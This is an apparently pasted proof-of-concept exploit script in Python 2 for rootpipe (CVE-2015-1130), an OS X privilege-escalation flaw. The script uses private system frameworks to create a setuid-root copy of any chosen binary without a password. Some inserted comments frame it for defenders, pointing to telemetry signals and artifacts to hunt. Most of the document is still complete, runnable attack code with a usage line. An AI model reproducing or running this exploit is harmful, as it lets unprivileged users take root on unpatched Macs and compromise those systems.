OSXroot

From Fiery Macaw, 7 Years ago, written in Plain Text, viewed 609 times.
  1. ########################################################
  2. #
  3. #  PoC exploit code for rootpipe (CVE-2015-1130)
  4. #
  5. #  Created by Emil Kvarnhammar, TrueSec
  6. #
  7. #  Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2
  8. #
  9. ########################################################
  10. import os
  11. import sys
  12. import platform
  13. import re
  14. import ctypes
  15. import objc
  16. import sys
  17. from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions
  18. from Foundation import NSAutoreleasePool
  19.  
def load_lib(append_path):
    """Load a binary from the private-frameworks directory via ctypes.

    ``append_path`` is concatenated verbatim onto the
    ``/System/Library/PrivateFrameworks/`` prefix and the result is handed to
    ``ctypes.cdll.LoadLibrary``; the loaded library handle is returned.
    Nothing here validates or normalises ``append_path``.
    """
    # NOTE(review): a scripting runtime loading a private system framework
    # this way is presumably rare in normal use, so it may be a useful signal
    # in endpoint telemetry -- confirm against a baseline.
    framework_path = "/System/Library/PrivateFrameworks/" + append_path
    handle = ctypes.cdll.LoadLibrary(framework_path)
    return handle
  22.  
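def use_old_api():
    """Report whether the running OS X release is 10.7.x or 10.8.x.

    Returns the ``re`` match object (truthy) when ``platform.mac_ver()[0]``
    is "10.7" or "10.8", optionally followed by one ".<digit>" component,
    and ``None`` for any other version string (including the empty string
    that ``platform.mac_ver()`` reports on non-Mac systems).
    """
    # The dots are escaped so they match a literal "." only, and the pattern
    # is a raw string so "\d" reaches the regex engine as a digit class
    # instead of being read as a string escape.
    return re.match(r"^(10\.7|10\.8)(\.\d)?$", platform.mac_ver()[0])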
  25.  
  26.  
# Top-level flow of the PoC. The syntax is Python 2 (print statements and a
# 0-prefixed octal literal), so it does not parse under Python 3.
#
# Reading guide for defenders: the script reads a local file, then asks a
# system framework's helper object to create a copy of it at a chosen path
# with setuid permission bits. No password or credential prompt appears
# anywhere in this flow; the authorization passed is either a freshly created
# SFAuthorization object or None.
# NOTE(review): that such a request is honoured for an unprivileged caller is
# presumably the flaw the header refers to as rootpipe (CVE-2015-1130) --
# confirm against the vendor advisory, and treat the OS X versions listed in
# the header as affected until updated to a release that carries the fix.
args = sys.argv

# Exactly two positional arguments are required: the file to copy and the
# destination path.
if len(args) != 3:
    print "usage: exploit.py source_binary dest_binary_as_root"
    sys.exit(-1)

source_binary = args[1]
# realpath() resolves symlinks and relative components, so the path handed to
# the framework call below is absolute.
dest_binary = os.path.realpath(args[2])

if not os.path.exists(source_binary):
    raise Exception("file does not exist!")

# Autorelease pool for the Objective-C objects created below; dropped by the
# `del pool` at the end of the script.
pool = NSAutoreleasePool.alloc().init()

# File attributes for the new file. 04777 is octal: the leading 4 is the
# setuid bit and 777 is read/write/execute for owner, group and others.
# NOTE(review): per the usage string the file is expected to be created as
# root, which would make the result a setuid-root executable -- a setuid file
# appearing at an unexpected path is the main on-disk artifact to hunt for.
attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(04777, NSFilePosixPermissions)
# Entire contents of the source file, loaded into memory.
data = NSData.alloc().initWithContentsOfFile_(source_binary)

print "will write file", dest_binary

if use_old_api():
    # Branch taken when use_old_api() matches a 10.7 / 10.8 version string:
    # goes through Admin.framework.
    # adm_lib is not used again; presumably the load is needed only so that
    # objc.lookUpClass can find the classes below -- TODO confirm.
    adm_lib = load_lib("/Admin.framework/Admin")
    Authenticator = objc.lookUpClass("Authenticator")
    ToolLiaison = objc.lookUpClass("ToolLiaison")
    SFAuthorization = objc.lookUpClass("SFAuthorization")

    authent = Authenticator.sharedAuthenticator()
    authref = SFAuthorization.authorization()

    # authref with value nil is not accepted on OS X <= 10.8
    authent.authenticateUsingAuthorizationSync_(authref)
    st = ToolLiaison.sharedToolLiaison()
    tool = st.tool()
    # Requests creation of dest_binary with the contents and attributes
    # prepared above.
    tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
else:
    # Branch for every other version string: goes through
    # SystemAdministration.framework and its WriteConfigClient class.
    # As above, adm_lib itself is not used after the load.
    adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration")
    WriteConfigClient = objc.lookUpClass("WriteConfigClient")
    client = WriteConfigClient.sharedClient()
    # None (nil) is passed as the authorization on this path.
    client.authenticateUsingAuthorizationSync_(None)
    tool = client.remoteProxy()

    # Same file-creation request as the other branch, issued on the remote
    # proxy with one extra trailing argument (0).
    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)


# Printed unconditionally: the script does not check whether the file was
# actually created.
print "Done!"

del pool
